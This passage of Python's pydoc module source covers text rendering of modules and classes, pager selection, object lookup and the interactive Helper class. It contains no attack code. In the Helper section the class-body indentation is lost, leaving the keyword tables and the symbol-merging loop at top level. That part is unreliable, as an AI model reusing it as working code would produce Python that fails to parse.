    # ---------------------------------------------- type-specific routines
    def formattree(self, tree, modname, parent=None, prefix=''):
        """Render in text a class tree as returned by inspect.getclasstree()."""
        result = ''
        for entry in tree:
            if type(entry) is type(()):
                c, bases = entry
                result = result + prefix + classname(c, modname)
                if bases and bases != (parent,):
                    parents = (classname(c, modname) for c in bases)
                    result = result + '(%s)' % ', '.join(parents)
                result = result + '\n'
            elif type(entry) is type([]):
                # A list entry holds the subclasses of the preceding tuple's
                # class; render them indented one level deeper.
                result = result + self.formattree(
                    entry, modname, c, prefix + '    ')
        return result
    def docmodule(self, object, name=None, mod=None):
        """Produce text documentation for a given module object."""
        name = object.__name__ # ignore the passed-in name
        synop, desc = splitdoc(getdoc(object))
        result = self.section('NAME', name + (synop and ' - ' + synop))
        all = getattr(object, '__all__', None)
        docloc = self.getdocloc(object)
        if docloc is not None:
            result = result + self.section('MODULE REFERENCE', docloc + """
The following documentation is automatically generated from the Python
source files. It may be incomplete, incorrect or include features that
are considered implementation detail and may vary between Python
implementations. When in doubt, consult the module reference at the
location listed above.
""")
        if desc:
            result = result + self.section('DESCRIPTION', desc)
        classes = []
        for key, value in inspect.getmembers(object, inspect.isclass):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None
                or (inspect.getmodule(value) or object) is object):
                if visiblename(key, all, object):
                    classes.append((key, value))
        funcs = []
        for key, value in inspect.getmembers(object, inspect.isroutine):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None or
                inspect.isbuiltin(value) or inspect.getmodule(value) is object):
                if visiblename(key, all, object):
                    funcs.append((key, value))
        data = []
        for key, value in inspect.getmembers(object, isdata):
            if visiblename(key, all, object):
                data.append((key, value))
        modpkgs = []
        modpkgs_names = set()
        if hasattr(object, '__path__'):
            for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
                modpkgs_names.add(modname)
                if ispkg:
                    modpkgs.append(modname + ' (package)')
                else:
                    modpkgs.append(modname)
            modpkgs.sort()
            result = result + self.section(
                'PACKAGE CONTENTS', '\n'.join(modpkgs))
        # Detect submodules as sometimes created by C extensions
        submodules = []
        for key, value in inspect.getmembers(object, inspect.ismodule):
            if value.__name__.startswith(name + '.') and key not in modpkgs_names:
                submodules.append(key)
        if submodules:
            submodules.sort()
            result = result + self.section(
                'SUBMODULES', '\n'.join(submodules))
        if classes:
            classlist = [value for key, value in classes]
            contents = [self.formattree(
                inspect.getclasstree(classlist, 1), name)]
            for key, value in classes:
                contents.append(self.document(value, key, name))
            result = result + self.section('CLASSES', '\n'.join(contents))
        if funcs:
            contents = []
            for key, value in funcs:
                contents.append(self.document(value, key, name))
            result = result + self.section('FUNCTIONS', '\n'.join(contents))
        if data:
            contents = []
            for key, value in data:
                contents.append(self.docother(value, key, name, maxlen=70))
            result = result + self.section('DATA', '\n'.join(contents))
        if hasattr(object, '__version__'):
            version = str(object.__version__)
            # Strip RCS/CVS-style "$Revision: ...$" wrappers.
            if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
                version = version[11:-1].strip()
            result = result + self.section('VERSION', version)
        if hasattr(object, '__date__'):
            result = result + self.section('DATE', str(object.__date__))
        if hasattr(object, '__author__'):
            result = result + self.section('AUTHOR', str(object.__author__))
        if hasattr(object, '__credits__'):
            result = result + self.section('CREDITS', str(object.__credits__))
        try:
            file = inspect.getabsfile(object)
        except TypeError:
            # Built-in modules have no source file.
            file = '(built-in)'
        result = result + self.section('FILE', file)
        return result
    def docclass(self, object, name=None, mod=None, *ignored):
        """Produce text documentation for a given class object."""
        realname = object.__name__
        name = name or realname
        bases = object.__bases__
        def makename(c, m=object.__module__):
            return classname(c, m)
        if name == realname:
            title = 'class ' + self.bold(realname)
        else:
            title = self.bold(name) + ' = class ' + realname
        if bases:
            parents = map(makename, bases)
            title = title + '(%s)' % ', '.join(parents)
        doc = getdoc(object)
        contents = doc and [doc + '\n'] or []
        push = contents.append
        # List the mro, if non-trivial.
        mro = deque(inspect.getmro(object))
        if len(mro) > 2:
            push("Method resolution order:")
            for base in mro:
                push('    ' + makename(base))
            push('')
        # Cute little class to pump out a horizontal rule between sections.
        class HorizontalRule:
            def __init__(self):
                self.needone = 0
            def maybe(self):
                if self.needone:
                    push('-' * 70)
                self.needone = 1
        hr = HorizontalRule()
        # The spill* helpers consume attrs matching their predicate, emit
        # text for them, and return the leftover attrs.
        def spill(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    try:
                        value = getattr(object, name)
                    except Exception:
                        # Some descriptors may meet a failure in their __get__.
                        # (bug #1785)
                        push(self._docdescriptor(name, value, mod))
                    else:
                        push(self.document(value,
                                        name, mod, object))
            return attrs
        def spilldescriptors(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    push(self._docdescriptor(name, value, mod))
            return attrs
        def spilldata(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    if callable(value) or inspect.isdatadescriptor(value):
                        doc = getdoc(value)
                    else:
                        doc = None
                    try:
                        obj = getattr(object, name)
                    except AttributeError:
                        obj = homecls.__dict__[name]
                    push(self.docother(obj, name, mod, maxlen=70, doc=doc) +
                         '\n')
            return attrs
        attrs = [(name, kind, cls, value)
                 for name, kind, cls, value in classify_class_attrs(object)
                 if visiblename(name, obj=object)]
        # Emit attrs grouped by the class that defines them, in MRO order.
        while attrs:
            if mro:
                thisclass = mro.popleft()
            else:
                thisclass = attrs[0][2]
            attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
            if thisclass is builtins.object:
                attrs = inherited
                continue
            elif thisclass is object:
                tag = "defined here"
            else:
                tag = "inherited from %s" % classname(thisclass,
                                                      object.__module__)
            # Sort attrs by name.
            attrs.sort()
            # Pump out the attrs, segregated by kind.
            attrs = spill("Methods %s:\n" % tag, attrs,
                          lambda t: t[1] == 'method')
            attrs = spill("Class methods %s:\n" % tag, attrs,
                          lambda t: t[1] == 'class method')
            attrs = spill("Static methods %s:\n" % tag, attrs,
                          lambda t: t[1] == 'static method')
            attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
                                     lambda t: t[1] == 'data descriptor')
            attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
                              lambda t: t[1] == 'data')
            assert attrs == []
            attrs = inherited
        contents = '\n'.join(contents)
        if not contents:
            return title + '\n'
        return title + '\n' + self.indent(contents.rstrip(), ' |  ') + '\n'
    def formatvalue(self, object):
        """Format an argument default value as text."""
        return '=' + self.repr(object)
    def docroutine(self, object, name=None, mod=None, cl=None):
        """Produce text documentation for a function or method object."""
        realname = object.__name__
        name = name or realname
        note = ''
        skipdocs = 0
        if _is_bound_method(object):
            imclass = object.__self__.__class__
            if cl:
                if imclass is not cl:
                    note = ' from ' + classname(imclass, mod)
            else:
                if object.__self__ is not None:
                    note = ' method of %s instance' % classname(
                        object.__self__.__class__, mod)
                else:
                    note = ' unbound %s method' % classname(imclass, mod)
        if name == realname:
            title = self.bold(realname)
        else:
            # Bound under a different name; if the real one is documented in
            # the same class, skip repeating the docs here.
            if (cl and realname in cl.__dict__ and
                cl.__dict__[realname] is object):
                skipdocs = 1
            title = self.bold(name) + ' = ' + realname
        argspec = None
        if inspect.isroutine(object):
            try:
                signature = inspect.signature(object)
            except (ValueError, TypeError):
                # Builtins and some extension routines are not introspectable.
                signature = None
            if signature:
                argspec = str(signature)
                if realname == '<lambda>':
                    title = self.bold(name) + ' lambda '
                    # XXX lambda's won't usually have func_annotations['return']
                    # since the syntax doesn't support but it is possible.
                    # So removing parentheses isn't truly safe.
                    argspec = argspec[1:-1] # remove parentheses
        if not argspec:
            argspec = '(...)'
        decl = title + argspec + note
        if skipdocs:
            return decl + '\n'
        else:
            doc = getdoc(object) or ''
            return decl + '\n' + (doc and self.indent(doc).rstrip() + '\n')
    def _docdescriptor(self, name, value, mod):
        # Bold name on its own line, followed by the indented docstring.
        results = []
        push = results.append
        if name:
            push(self.bold(name))
            push('\n')
        doc = getdoc(value) or ''
        if doc:
            push(self.indent(doc))
            push('\n')
        return ''.join(results)
    def docproperty(self, object, name=None, mod=None, cl=None):
        """Produce text documentation for a property."""
        return self._docdescriptor(name, object, mod)
    def docdata(self, object, name=None, mod=None, cl=None):
        """Produce text documentation for a data descriptor."""
        return self._docdescriptor(name, object, mod)
    def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
        """Produce text documentation for a data object."""
        repr = self.repr(object)
        if maxlen:
            # Truncate the repr so 'name = repr' fits within maxlen columns.
            line = (name and name + ' = ' or '') + repr
            chop = maxlen - len(line)
            if chop < 0: repr = repr[:chop] + '...'
        line = (name and self.bold(name) + ' = ' or '') + repr
        if doc is not None:
            line += '\n' + self.indent(str(doc))
        return line
class _PlainTextDoc(TextDoc):
    """TextDoc variant that emits no overstrike 'bold' styling."""
    def bold(self, text):
        # Return the text unchanged instead of overstriking it.
        return text
# --------------------------------------------------------- user interfaces
def pager(text):
    """Page through *text*, selecting the pager on first use."""
    global pager
    # Escape non-encodable characters up front so the chosen pager never
    # hits encoding errors mid-stream.
    fs_enc = sys.getfilesystemencoding()
    text = text.encode(fs_enc, 'backslashreplace').decode(fs_enc)
    # Replace this bootstrap function with the concrete pager, then
    # delegate this first call to it.
    pager = getpager()
    pager(text)
def getpager():
    """Decide what method to use for paging through text.

    Returns a callable taking the text to display.  Falls back through:
    explicit $PAGER, dumb terminals, Windows 'more', 'less', a probed
    'more', and finally the built-in tty/plain pagers.
    """
    # Not a real terminal (or stdout replaced): just print.
    if not hasattr(sys.stdout, "isatty"):
        return plainpager
    if not sys.stdin.isatty() or not sys.stdout.isatty():
        return plainpager
    if 'PAGER' in os.environ:
        if sys.platform == 'win32': # pipes completely broken in Windows
            return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
        elif os.environ.get('TERM') in ('dumb', 'emacs'):
            return lambda text: pipepager(plain(text), os.environ['PAGER'])
        else:
            return lambda text: pipepager(text, os.environ['PAGER'])
    if os.environ.get('TERM') in ('dumb', 'emacs'):
        return plainpager
    if sys.platform == 'win32':
        return lambda text: tempfilepager(plain(text), 'more <')
    if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
        return lambda text: pipepager(text, 'less')
    # Probe for a working 'more' by paging a throwaway empty temp file.
    import tempfile
    (fd, filename) = tempfile.mkstemp()
    os.close(fd)
    try:
        if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
            return lambda text: pipepager(text, 'more')
        else:
            return ttypager
    finally:
        os.unlink(filename)
def plain(text):
    """Remove boldface formatting (char + backspace overstrikes) from text."""
    overstrike = re.compile('.\b')
    return overstrike.sub('', text)
def pipepager(text, cmd):
    """Page through text by feeding it to another program."""
    proc = os.popen(cmd, 'w')
    try:
        proc.write(text)
        proc.close()
    except OSError:
        # Ignore broken pipes caused by quitting the pager program.
        pass
def tempfilepager(text, cmd):
    """Page through text by invoking a program on a temporary file.

    Uses tempfile.mkstemp() instead of the deprecated, race-prone
    tempfile.mktemp(): the file is created atomically before the pager
    command runs, so no other process can claim the name first.
    """
    import tempfile
    fd, filename = tempfile.mkstemp()
    try:
        # fdopen takes ownership of fd; 'with' guarantees it is closed
        # (and flushed) before the pager reads the file.
        with os.fdopen(fd, 'w') as file:
            file.write(text)
        os.system(cmd + ' "' + filename + '"')
    finally:
        os.unlink(filename)
def ttypager(text):
    """Page through text on a text terminal.

    Reads single keypresses when a tty is available (Enter advances one
    line, b/B/Esc page backwards, q/Q quits, anything else pages
    forward); otherwise falls back to reading whole lines from stdin.
    """
    lines = plain(text).split('\n')
    try:
        import tty
        fd = sys.stdin.fileno()
        old = tty.tcgetattr(fd)
        tty.setcbreak(fd)
        getchar = lambda: sys.stdin.read(1)
    except (ImportError, AttributeError):
        tty = None
        getchar = lambda: sys.stdin.readline()[:-1][:1]
    try:
        # BUG FIX: environment values are strings, so the previous
        # os.environ.get('LINES', 25) - 1 raised TypeError whenever LINES
        # was actually set.  Parse it defensively and fall back to 25.
        try:
            h = int(os.environ.get('LINES', 0))
        except ValueError:
            h = 0
        if h <= 1:
            h = 25
        r = inc = h - 1
        sys.stdout.write('\n'.join(lines[:inc]) + '\n')
        while lines[r:]:
            sys.stdout.write('-- more --')
            sys.stdout.flush()
            c = getchar()
            if c in ('q', 'Q'):
                # Ten spaces: exactly enough to erase the '-- more --' prompt.
                sys.stdout.write('\r          \r')
                break
            elif c in ('\r', '\n'):
                sys.stdout.write('\r          \r' + lines[r] + '\n')
                r = r + 1
                continue
            if c in ('b', 'B', '\x1b'):
                r = r - inc - inc
                if r < 0: r = 0
            sys.stdout.write('\n' + '\n'.join(lines[r:r+inc]) + '\n')
            r = r + inc
    finally:
        # Restore the terminal mode even if paging is interrupted.
        if tty:
            tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
    """Simply print unformatted text.  This is the ultimate fallback."""
    stripped = plain(text)
    sys.stdout.write(stripped)
def describe(thing):
    """Produce a short description of the given thing.

    The checks are ordered from most to least specific; unrecognized
    objects fall through to their type name.
    """
    if inspect.ismodule(thing):
        modname = thing.__name__
        if modname in sys.builtin_module_names:
            return 'built-in module ' + modname
        if hasattr(thing, '__path__'):
            return 'package ' + modname
        return 'module ' + modname
    if inspect.isbuiltin(thing):
        return 'built-in function ' + thing.__name__
    if inspect.isgetsetdescriptor(thing) or inspect.ismemberdescriptor(thing):
        kind = ('getset descriptor' if inspect.isgetsetdescriptor(thing)
                else 'member descriptor')
        owner = thing.__objclass__
        return '{} {}.{}.{}'.format(kind, owner.__module__, owner.__name__,
                                    thing.__name__)
    if inspect.isclass(thing):
        return 'class ' + thing.__name__
    if inspect.isfunction(thing):
        return 'function ' + thing.__name__
    if inspect.ismethod(thing):
        return 'method ' + thing.__name__
    return type(thing).__name__
def locate(path, forceload=0):
    """Locate an object by name or dotted path, importing as necessary."""
    parts = [piece for piece in path.split('.') if piece]
    # Import the longest importable prefix of the dotted path.
    module, n = None, 0
    while n < len(parts):
        candidate = safeimport('.'.join(parts[:n+1]), forceload)
        if not candidate:
            break
        module, n = candidate, n + 1
    # Resolve the remaining components as attributes, starting either from
    # the imported module or from builtins when nothing was importable.
    object = module if module else builtins
    for part in parts[n:]:
        try:
            object = getattr(object, part)
        except AttributeError:
            return None
    return object
# --------------------------------------- interactive interpreter interface
# Shared renderer instances used by the top-level helper functions below.
text = TextDoc()
plaintext = _PlainTextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
    """Given an object or a path to an object, get the object and its name."""
    if not isinstance(thing, str):
        # Already an object: derive its name, but only trust string names.
        name = getattr(thing, '__name__', None)
        return thing, name if isinstance(name, str) else None
    object = locate(thing, forceload)
    if object:
        return object, thing
    raise ImportError('no Python documentation found for %r' % thing)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0,
               renderer=None):
    """Render text documentation, given an object or a path to an object."""
    if renderer is None:
        renderer = text
    object, name = resolve(thing, forceload)
    desc = describe(object)
    module = inspect.getmodule(object)
    # Qualify the description with the containing package or module.
    if name and '.' in name:
        desc += ' in ' + name[:name.rfind('.')]
    elif module and module is not object:
        desc += ' in module ' + module.__name__
    documentable = (inspect.ismodule(object) or inspect.isclass(object)
                    or inspect.isroutine(object)
                    or inspect.isgetsetdescriptor(object)
                    or inspect.ismemberdescriptor(object)
                    or isinstance(object, property))
    if not documentable:
        # If the passed object is a piece of data or an instance,
        # document its available methods instead of its value.
        object = type(object)
        desc += ' object'
    return title % desc + '\n\n' + renderer.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0,
        output=None):
    """Display text documentation, given an object or a path to an object."""
    try:
        if output is None:
            # Interactive use: page the styled text.
            pager(render_doc(thing, title, forceload))
            return
        # Explicit output stream: write plain (unstyled) text.
        output.write(render_doc(thing, title, forceload, plaintext))
    except (ImportError, ErrorDuringImport) as value:
        print(value)
def writedoc(thing, forceload=0):
    """Write HTML documentation to a file in the current directory.

    The output file is named '<name>.html'.  Import/resolution failures
    are printed rather than raised, matching doc()'s behavior.
    """
    try:
        object, name = resolve(thing, forceload)
        page = html.page(describe(object), html.document(object, name))
        # 'with' guarantees the file is closed even if write() raises,
        # where the original open()/close() pair could leak the handle.
        with open(name + '.html', 'w', encoding='utf-8') as file:
            file.write(page)
        print('wrote', name + '.html')
    except (ImportError, ErrorDuringImport) as value:
        print(value)
def writedocs(dir, pkgpath='', done=None):
    """Write out HTML documentation for all modules in a directory tree."""
    # NOTE(review): 'done' is accepted for backward compatibility but is
    # never read or updated here -- modules are not de-duplicated.
    if done is None: done = {}
    for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
        writedoc(modname)
    return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'False': '',
'None': '',
'True': '',
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'nonlocal NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'nonlocal': ('nonlocal', 'global NAMESPACES'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS': ("'", "'''", "r'", "b'", '"""', '"', 'r"', 'b"'),
'OPERATORS': ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON': ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY': ('-', '~'),
'AUGMENTEDASSIGNMENT': ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE': ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX': ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.items():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING range LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS MAPPINGMETHODS '
'NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global nonlocal ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'CONVERSIONS': ('conversions', ''),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS NUMBERS TUPLELITERALS '
'LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
    # Store the raw streams; the `input`/`output` properties below fall
    # back to sys.stdin/sys.stdout whenever these are None.
    self._input = input
    self._output = output

# Resolve the streams lazily at access time so later rebinding of
# sys.stdin/sys.stdout (e.g. by test harnesses) is honoured.
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
    # When evaluated directly at the interactive prompt the caller's
    # frame is named '?'; in that case start the help session instead
    # of printing a repr (this is what makes bare `help` work).
    if inspect.stack()[1][3] == '?':
        self()
        return ''
    return '<pydoc.Helper instance>'
# Sentinel distinguishing "no argument given" from help(None).
_GoInteractive = object()

def __call__(self, request=_GoInteractive):
    """Show help for *request*, or start the interactive help loop."""
    if request is not self._GoInteractive:
        self.help(request)
    else:
        self.intro()
        self.interact()
        self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
    """Loop reading help requests until quit/EOF/blank line."""
    self.output.write('\n')
    while True:
        try:
            request = self.getline('help> ')
            if not request: break
        except (KeyboardInterrupt, EOFError):
            break
        # `replace` is a module-level pydoc helper; this strips any
        # quote characters the user typed around the topic name.
        request = replace(request, '"', '', "'", '').strip()
        if request.lower() in ('q', 'quit'): break
        self.help(request)
def getline(self, prompt):
    """Read one line from the help input stream.

    The builtin input() is used (so line editing works) when the
    source really is sys.stdin; otherwise the prompt is echoed to the
    output stream and a raw line is read.
    """
    source = self.input
    if source is not sys.stdin:
        sink = self.output
        sink.write(prompt)
        sink.flush()
        return source.readline()
    return input(prompt)
def help(self, request):
    """Dispatch a single help request to the appropriate handler."""
    if type(request) is type(''):
        request = request.strip()
        # Commands first, then the symbol/keyword/topic tables,
        # finally fall through to documenting a named object.
        if request == 'help': self.intro()
        elif request == 'keywords': self.listkeywords()
        elif request == 'symbols': self.listsymbols()
        elif request == 'topics': self.listtopics()
        elif request == 'modules': self.listmodules()
        elif request[:8] == 'modules ':
            # "modules spam" searches module synopses for 'spam'.
            self.listmodules(request.split()[1])
        elif request in self.symbols: self.showsymbol(request)
        elif request in ['True', 'False', 'None']:
            # special case these keywords since they are objects too
            doc(eval(request), 'Help on %s:')
        elif request in self.keywords: self.showtopic(request)
        elif request in self.topics: self.showtopic(request)
        elif request: doc(request, 'Help on %s:', output=self._output)
    elif isinstance(request, Helper): self()
    else: doc(request, 'Help on %s:', output=self._output)
    self.output.write('\n')
def intro(self):
    """Write the interactive help banner to the output stream."""
    # The same short version string is substituted twice (banner and
    # tutorial URL).
    self.output.write('''
Welcome to Python %s's help utility!
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics". Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
    """Write *items*, sorted, as a column-major table *columns* wide."""
    entries = sorted(items)
    count = len(entries)
    colwidth = width // columns
    nrows = -(-count // columns)  # ceiling division
    write = self.output.write
    for row in range(nrows):
        for col in range(columns):
            index = col * nrows + row
            if index < count:
                entry = entries[index]
                write(entry)
                # Pad up to the column boundary, except after the
                # final column.
                if col != columns - 1:
                    write(' ' + ' ' * (colwidth - 1 - len(entry)))
        write('\n')
def listkeywords(self):
    """Print the table of Python keywords."""
    self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
    self.list(self.keywords.keys())
def listsymbols(self):
    """Print the table of punctuation symbols that have help topics."""
    self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
    self.list(self.symbols.keys())
def listtopics(self):
    """Print the table of available help topics."""
    self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
    self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
    """Page the documentation for *topic*, then list related topics.

    *more_xrefs* is an optional extra space-separated cross-reference
    string appended to the topic's own references.
    """
    try:
        import pydoc_data.topics
    except ImportError:
        self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
        return
    # Table values are either a (label, xrefs) pair or a plain string
    # naming another topic (an alias).
    target = self.topics.get(topic, self.keywords.get(topic))
    if not target:
        self.output.write('no documentation found for %s\n' % repr(topic))
        return
    if type(target) is type(''):
        # Alias: follow it, carrying the extra cross references along.
        return self.showtopic(target, more_xrefs)
    label, xrefs = target
    try:
        doc = pydoc_data.topics.topics[label]
    except KeyError:
        self.output.write('no documentation found for %s\n' % repr(topic))
        return
    pager(doc.strip() + '\n')
    if more_xrefs:
        xrefs = (xrefs or '') + ' ' + more_xrefs
    if xrefs:
        import textwrap
        text = 'Related help topics: ' + ', '.join(xrefs.split()) + '\n'
        wrapped_text = textwrap.wrap(text, 72)
